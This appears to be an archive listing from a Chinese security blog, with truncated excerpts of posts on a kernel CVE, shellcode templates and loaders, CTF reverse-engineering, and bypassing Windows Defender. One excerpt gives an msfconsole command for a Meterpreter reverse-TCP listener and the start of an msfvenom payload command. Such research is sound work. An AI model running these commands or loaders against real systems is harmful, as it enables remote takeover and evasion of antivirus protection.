- 2024-11-01CVE-2022-0185
这是一个关于整型溢出的CVE。staticintlegacy_parse_param(structfs_context*fc,structfs_parameter*param){ structlegacy_fs_context*ctx=fc->fs_private; //[1]ctx与文件描述符相关 unsignedintsize=ctx->data_size; //[2]size——目前已经写
- 2024-10-14Wx64ST:一款轻松可修改的C语言Shellcode模板
原创Alpha_h4ckFreeBuf关于windows_x64_shellcode_templatewindows_x64_shellcode_template简称为Wx64ST,它是一款功能强大的Shellcode模板,该模板基于C语言编写,其简单、可扩展和易于修改等特性可以帮助广大安全研究人员轻松开发适用于Windowsx64的Shellcode。值得一提的是,
- 2024-09-04Wx64ST:一款轻松可修改的C语言Shellcode模板
关于windows_x64_shellcode_templatewindows_x64_shellcode_template简称为Wx64ST,它是一款功能强大的Shellcode模板,该模板基于C语言编写,其简单、可扩展和易于修改等特性可以帮助广大安全研究人员轻松开发适用于Windowsx64的Shellcode。值得一提的是,该模板代码可以加载Load
- 2023-10-06SMC出题记录
SMC出题记录:SMC:当我们用IDA反汇编时看到的就是异或前的机器码,也就是加过密的。而程序运行中会自己调用for循环解密机器码,所以运行起来就没问题,而对静态分析会产生干扰出题源码:#include<stdio.h>#include<Windows.h>#include<stdlib.h>voidtest(){printf("Congratu
- 2023-07-31DASCTF 2023 & 0X401七月暑期挑战赛
比赛只出了一道,小菜不是罪过-_-controlflow这个题动调到底就行foriinrange(40):after_xor[i]=inp[i]^0x401after_xor[i]+=i*i;foriinrange(11,30,1):x=i-10after_xor[i]^=x*(x+1)foriinrange(40):after_xor[i]-=iafter_xo
- 2023-06-16白名单rundll32加载shellcode上线metasploit(nim学习系列)
白名单rundll32加载shellcode上线metasploit监听metasploitmsfconsole-x"useexploits/multi/handler;setlhost192.168.0.101;setlport443;setpayloadwindows/x64/meterpreter/reverse_tcp;exploit"生成shellcodemsfvenom-pwindows/x64/meterpreter/r
- 2023-03-13go mmap
packagemainimport("fmt""os""syscall")funcF(a,buint64)uint64{r:=make([]uint64,1)cadd(r,9,8)returna+b+r[0]}funccalls(res[]ui
- 2023-01-25绕过 Windows Defender (最新版本)
在本文中,将绕过WindowsDefender(最新版本),并详细解释每个步骤。准备-Windows10机器(目标机)-已获取目标机的低级特权帐户-Linux机器(攻击者)-DefenderAnti-Virus在发布
- 2023-01-19使用Graalvm加载Shellcode
Graalvm介绍介绍Graalvm之前,首先就要了解Java编译的JIT和AOT是什么JIT(Just-in-Time,即时编译)和AOT(Ahead-of-Time,预编译),就像Java常见的是需要什么类,就加载进来编译并
- 2022-12-22CRC计算
参考,(159条消息)CRC16常见几个标准的算法及C语言实现_leumber的博客-CSDN博客_crc16#include<stdio.h>/****************************Info***************************